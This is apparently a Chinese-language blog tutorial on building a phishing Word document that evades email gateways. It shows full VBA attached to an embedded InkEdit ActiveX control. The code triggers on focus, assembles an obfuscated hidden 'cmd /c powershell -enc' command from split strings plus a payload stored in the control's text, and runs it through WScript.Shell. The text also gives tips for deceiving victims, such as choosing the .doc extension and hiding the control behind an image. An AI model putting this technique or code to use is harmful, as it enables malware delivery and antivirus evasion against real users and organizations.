Office控件钓鱼：混淆拼接篇

钓鱼邮件作为APT常用手法之一，手法层出不穷，各大企业和组织的安全部门也把钓鱼防控列为重点。邮件网关防病毒，防垃圾各类防御设备能上的都上。防御设备虽多，但是为了业务需求，特别是邮件业务繁多的企业，邮件防御设备往往只开启了静态查杀或者特征查杀，均未开启沙箱动态查杀。这里分享一个绕过大部分邮件网关的姿势。

一、钓鱼文档制作

1.1新建文档

这边以word为例，新建一个doc为后缀的word文档,之所以选doc因为doc相较于docm等后缀更具有迷惑性，兼容性也是超棒的。

1.2插入控件

点击开发工具→旧式窗体→更多控件

这里选Microsoft LnkEdit Control，选其他的也行，再配合上漏洞，如flash啥的。

属性如上图，双击控件，编辑代码

1.3代码编写（拼接）

由于杀软的特征库的日益完善，特别是工具生成的恶意代码，分分钟就被杀了，这时候我们就要想办法进行绕过查杀。这里我们用代码拼接的方法。拼接部分可以写在任意的地方，只要能够取值，如下图就把代码插在了控件的属性变量中。

完整代码如下

Private Sub InkEdit1_GotFocus()
xiaojiangjj1cm
Application.DisplayAlerts = True
End Sub
Private Sub xiaojiangjj1cm()
Dim var_str, str00, str01, str2, str22
str1 = "ell.exe -noP -sta -w 1 -enc xe /c powershcmd.e"
str22 = Right(str1, 18)
str2 = Right(str22, 5) & Mid(str22, 1, Len(str22) - 5) & Mid(str1, 1, Len(str1) - 18)
str00 = InkEdit1.Text
var_str = str2 & str00
Set ws = CreateObject("WScr" & "ipt.Sh" & "ell")
ws.Run var_str, 0, False
End Sub

为了更加客观，我们进行调试

可以看出正文用了多个变量进行拼接命令，甚至可以添加脏数据。最后拼接处命令执行。

二、效果演示

点击前控件变成一个XX，我们可以在XX底下放张图片，根据钓鱼内容，使其更具迷惑性。而且值得注意的是，安全警告不再是启用宏而是部分活动内容被禁用。使其更具迷惑性。

点击后